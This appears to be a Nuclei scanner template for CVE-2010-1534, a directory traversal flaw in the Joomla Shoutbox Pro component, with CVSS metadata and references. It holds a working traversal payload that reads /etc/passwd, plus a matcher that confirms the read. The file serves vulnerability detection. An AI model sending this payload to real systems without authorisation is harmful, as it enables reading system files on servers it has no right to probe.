id: CVE-2010-1534 info: name: Joomla! Component Shoutbox Pro - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. remediation: Upgrade to a supported version reference: - https://www.exploit-db.com/exploits/12067 - https://nvd.nist.gov/vuln/detail/CVE-2010-1534 - http://www.exploit-db.com/exploits/12067 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57534 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1534 cwe-id: CWE-22 epss-score: 0.01228 epss-percentile: 0.83763 cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla.batjo product: com_shoutbox tags: joomla,lfi,edb,cve,cve2010,joomla.batjo http: - method: GET path: - "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4b0a0048304602210092b4cd176b84b1cec147b3af6069f4a72db87e970db3a5159343589ff42bbbdd022100e1e1203f0a25c2ef5b158c18a188524a61440fab1a3046baad2e52374ad7293e:922c64590222798bb761d5b6d8e72950